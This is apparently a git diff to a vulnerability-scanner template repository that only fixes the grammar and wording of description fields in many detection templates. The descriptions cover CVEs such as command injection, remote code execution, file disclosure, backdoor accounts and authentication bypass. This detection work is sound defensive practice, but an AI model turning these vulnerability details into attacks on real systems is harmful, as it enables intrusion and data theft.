info: name: YouPHPTube Encoder RCE author: pikpikcu severity: critical - description: A command injection have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 tags: cve,cve2019,rce diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index 5639b9366a..b6a5302242 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -4,7 +4,7 @@ info: name: File Content Disclosure on Rails author: omarkurt severity: medium - description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. + description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 126476f33d..c43c5b0539 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -4,7 +4,7 @@ info: name: GLPI v.9.4.6 - Open redirect author: pikpikcu severity: low - description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. + description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 84fa26ca9a..9deaa4c983 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -4,7 +4,7 @@ info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam severity: critical - description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 987eee7315..88ec587026 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -4,7 +4,7 @@ info: name: WP File Manager RCE author: foulenzer severity: critical - description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. + description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day @@ -61,4 +61,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 92402a073f..822c9f5ef4 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -4,7 +4,7 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik severity: medium - description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. + description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index cc1e8636a0..8381e16ece 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 2ce50c5cfa..4e77e68e53 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -4,7 +4,7 @@ info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 00e084429e..3ecd474e88 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,7 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high - description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index fd2fcf9241..08d43a9cd4 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -3,7 +3,7 @@ info: name: UnRaid Remote Code Execution author: madrobot severity: high - description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code. + description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index e4043100bf..d08e8d811a 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2020,rce - description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2. + description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index 3e012c49bd..c9f38d9a42 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9402 info: name: Django SQL Injection - description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. reference: - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index a03934277c..2336c16344 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -3,7 +3,7 @@ info: name: rConfig Unauthenticated Sensitive Information Disclosure author: madrobot severity: high - description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. + description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. reference: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 9b852d57e9..4e9eb24eec 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ - description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin. + description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce requests: diff --git a/cves/2021/CVE-2021-28854.yaml b/cves/2021/CVE-2021-28854.yaml index 4a9b0724e2..0cf3986bfe 100644 --- a/cves/2021/CVE-2021-28854.yaml +++ b/cves/2021/CVE-2021-28854.yaml @@ -4,7 +4,7 @@ info: name: VICIdial - Multiple sensitive Information disclosure author: pdteam severity: high - description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21 + description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021. reference: https://github.com/JHHAX/VICIdial tags: cve,cve2021 diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index 0426b0eee2..b64016ff6a 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml @@ -3,7 +3,7 @@ id: CVE-2021-33221 info: name: CommScope Ruckus IoT Controller Unauthenticated Service Details author: geeknik - description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf severity: medium tags: cve,cve2021,commscope,ruckus,debug diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 951b8b696c..800d8aef3a 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -4,7 +4,7 @@ info: author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. reference: https://glpi-project.org/ requests: diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 03d63d443f..0b0ea1c0d4 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -4,7 +4,7 @@ info: name: E-mail service detector author: binaryfigments severity: info - description: Check the email service or spamfilter that is used for a domain. + description: Check the email service or spam filter that is used for a domain. tags: dns dns: diff --git a/exposures/files/yarn-lock.yaml b/exposures/files/yarn-lock.yaml index f2b729f35b..d75da95303 100644 --- a/exposures/files/yarn-lock.yaml +++ b/exposures/files/yarn-lock.yaml @@ -4,7 +4,7 @@ info: name: yarn lock file disclosure author: oppsec severity: info - description: yarn.lock is a file which store all exactly versions of each dependency were installed. + description: The yarn.lock file stores the versions of each Yarn dependency installed. tags: exposure requests: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 802ed499db..40ef7fe623 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -3,7 +3,7 @@ info: name: iis-shortname author: nodauf severity: info - description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. + description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~. tags: fuzz reference: diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml index 2f33447a4c..dccb08d14b 100644 --- a/iot/kevinlab-device-detect.yaml +++ b/iot/kevinlab-device-detect.yaml @@ -2,7 +2,7 @@ id: kevinlab-device-detect info: name: KevinLAB Devices Detection - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. author: gy741 severity: info tags: iot diff --git a/iot/xp-webcam.yaml b/iot/xp-webcam.yaml index f9942032ad..f7578077c4 100644 --- a/iot/xp-webcam.yaml +++ b/iot/xp-webcam.yaml @@ -4,7 +4,7 @@ info: name: XP Webcam Viewer Page author: aashiq severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body + description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. tags: webcam,iot requests: @@ -23,4 +23,4 @@ requests: words: - "Please provide a valid username/password to access this server." part: body - negative: true \ No newline at end of file + negative: true diff --git a/miscellaneous/google-floc-disabled.yaml b/miscellaneous/google-floc-disabled.yaml index 5db3fc078d..04184c7821 100644 --- a/miscellaneous/google-floc-disabled.yaml +++ b/miscellaneous/google-floc-disabled.yaml @@ -3,7 +3,7 @@ id: google-floc-disabled info: name: Google FLoC Disabled author: geeknik - description: The detected website has decided to explicity exclude itself from Google FLoC tracking. + description: The detected website has decided to explicilty exclude itself from Google FLoC tracking. reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ severity: info tags: google,floc,misc diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 1797130f74..ad0de0cd6f 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -4,8 +4,8 @@ info: name: Joomla htaccess file disclosure author: oppsec severity: info - description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... - tags: misc + description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml index 81b47737ad..99d9cb4e1a 100644 --- a/miscellaneous/joomla-manifest-file.yaml +++ b/miscellaneous/joomla-manifest-file.yaml @@ -4,8 +4,8 @@ info: name: Joomla manifest file disclosure author: oppsec severity: info - description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. - tags: misc + description: joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/moodle-changelog.yaml b/miscellaneous/moodle-changelog.yaml index c6db772dcd..8f73d5040e 100644 --- a/miscellaneous/moodle-changelog.yaml +++ b/miscellaneous/moodle-changelog.yaml @@ -4,7 +4,7 @@ info: name: Moodle Changelog File author: oppsec severity: info - description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version. + description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version. tags: misc requests: diff --git a/misconfiguration/aem/aem-userinfo-servlet.yaml b/misconfiguration/aem/aem-userinfo-servlet.yaml index e7b1b39316..f20d99bbc1 100644 --- a/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -4,7 +4,7 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. tags: aem @@ -28,4 +28,4 @@ requests: - type: word part: header words: - - 'application/json' \ No newline at end of file + - 'application/json' diff --git a/misconfiguration/exposed-service-now.yaml b/misconfiguration/exposed-service-now.yaml index c169a53e49..72c6c61cff 100644 --- a/misconfiguration/exposed-service-now.yaml +++ b/misconfiguration/exposed-service-now.yaml @@ -4,7 +4,7 @@ info: name: ITMS-Misconfigured author: dhiyaneshDK severity: info - description: detectes misconfigured Service-now ITSM instances + description: Detection of misconfigured ServiceNow ITSM instances. reference: - https://medium.com/@th3g3nt3l/multiple-information-exposed-due-to-misconfigured-service-now-itsm-instances-de7a303ebd56 - https://github.com/leo-hildegarde/SnowDownKB/ @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/misconfiguration/http-missing-security-headers.yaml b/misconfiguration/http-missing-security-headers.yaml index aef6738399..3f53d06de8 100644 --- a/misconfiguration/http-missing-security-headers.yaml +++ b/misconfiguration/http-missing-security-headers.yaml @@ -4,7 +4,7 @@ info: name: HTTP Missing Security Headers author: socketz,geeknik,G4L1T0,convisoappsec,kurohost,dawid-czarnecki severity: info - description: It searches missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. + description: It searches for missing security headers, but obviously, could be so less generic and could be useless for Bug Bounty. tags: misconfig,generic requests: @@ -124,4 +124,4 @@ requests: - type: regex name: access-control-allow-headers regex: - - "(?i)access-control-allow-headers" \ No newline at end of file + - "(?i)access-control-allow-headers" diff --git a/misconfiguration/laravel-debug-enabled.yaml b/misconfiguration/laravel-debug-enabled.yaml index 06791732aa..7be14a40fd 100644 --- a/misconfiguration/laravel-debug-enabled.yaml +++ b/misconfiguration/laravel-debug-enabled.yaml @@ -2,7 +2,7 @@ id: laravel-debug-enabled info: name: Laravel Debug Enabled author: notsoevilweasel - description: Laravel with APP_DEBUG set to true prone to showing verbose errors. + description: Laravel with APP_DEBUG set to true is prone to show verbose errors. severity: medium tags: debug,laravel,misconfig @@ -19,4 +19,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index 0897da8dc9..c8dbbcea18 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: medium tags: network,ssh,openssh - description: SSHv1 is a deprecated and have known cryptographic issues. + description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-cred-bruteforce.yaml index a13c7b367b..213c71805a 100644 --- a/network/mysql-native-cred-bruteforce.yaml +++ b/network/mysql-native-cred-bruteforce.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: info tags: network,mysql,bruteforce,db - description: MySQL instance with enabled native password support prone vulnerable for password brute-force attack. + description: MySQL instance with enabled native password support is prone to password brute-force attacks. network: - host: diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index bd7a7338cc..1bfb60d273 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -5,7 +5,7 @@ info: author: iamthefrogy severity: low tags: network,openssh - description: OpenSSH 5.3 is vulnerable to username enumeraiton and DoS vulnerabilities. + description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 diff --git a/vulnerabilities/generic/open-redirect.yaml b/vulnerabilities/generic/open-redirect.yaml index 7190b73c58..b317702918 100644 --- a/vulnerabilities/generic/open-redirect.yaml +++ b/vulnerabilities/generic/open-redirect.yaml @@ -4,7 +4,7 @@ info: name: Open URL redirect detection author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik severity: low - description: A user-controlled input redirect users to an external website. + description: A user-controlled input redirects users to an external website. tags: redirect,generic requests: diff --git a/vulnerabilities/other/couchdb-adminparty.yaml b/vulnerabilities/other/couchdb-adminparty.yaml index 6e387de0fd..cf0c635784 100644 --- a/vulnerabilities/other/couchdb-adminparty.yaml +++ b/vulnerabilities/other/couchdb-adminparty.yaml @@ -4,7 +4,7 @@ info: name: CouchDB Admin Party author: organiccrap severity: high - description: Requests made against CouchDB is done in the context of an admin user. + description: Requests made against CouchDB are done in the context of an admin user. tags: couchdb requests: diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index 7e05dfc26c..c6c41baad6 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -4,7 +4,7 @@ info: name: EyeLock nano NXT 3.5 - Local File Disclosure author: geeknik severity: high - description: nano NXT suffers from a file disclosure vulnerability when input passed thru the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. + description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock diff --git a/vulnerabilities/other/kevinlab-bems-backdoor.yaml b/vulnerabilities/other/kevinlab-bems-backdoor.yaml index 54619b0ce4..dd5701ed28 100644 --- a/vulnerabilities/other/kevinlab-bems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-bems-backdoor.yaml @@ -4,7 +4,7 @@ info: name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account author: gy741 severity: critical - description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. + description: The BEMS solution has an undocumented backdoor account, and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel, and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab diff --git a/vulnerabilities/other/kevinlab-hems-backdoor.yaml b/vulnerabilities/other/kevinlab-hems-backdoor.yaml index ea925ce800..7d4152fc83 100644 --- a/vulnerabilities/other/kevinlab-hems-backdoor.yaml +++ b/vulnerabilities/other/kevinlab-hems-backdoor.yaml @@ -4,7 +4,7 @@ info: name: KevinLAB HEMS Undocumented Backdoor Account author: gy741 severity: critical - description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. + description: The HEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution through the RMI. An attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the HEMS is offering remotely. reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php tags: kevinlab,default-login,backdoor @@ -38,4 +38,4 @@ requests: - type: word words: - 'PHPSESSID' - part: header \ No newline at end of file + part: header diff --git a/vulnerabilities/other/netgear-router-auth-bypass.yaml b/vulnerabilities/other/netgear-router-auth-bypass.yaml index 4f6c12b3c8..9bb69eefdd 100644 --- a/vulnerabilities/other/netgear-router-auth-bypass.yaml +++ b/vulnerabilities/other/netgear-router-auth-bypass.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200v1 Router Authentication Bypass author: gy741 severity: high - description: NETGEAR decided to use to check if a page has “.jpg”, “.gif” or “ess_” substrings, trying to match the entire URL. We can therefore access any page on the device, including those that require authentication, by appending a GET variable with the relevant substring (like “?.gif”). + description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml index 06555a6586..82c8b1411b 100644 --- a/vulnerabilities/other/sar2html-rce.yaml +++ b/vulnerabilities/other/sar2html-rce.yaml @@ -4,7 +4,7 @@ info: name: sar2html 3.2.1 - 'plot' Remote Code Execution author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a commend injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. reference: - https://www.exploit-db.com/exploits/49344 tags: sar2html,rce,oob diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index a8c7121123..51dfc17871 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -4,7 +4,7 @@ info: name: Spring Boot Actuators (Jolokia) XXE author: dwisiswant0,ipanda severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - 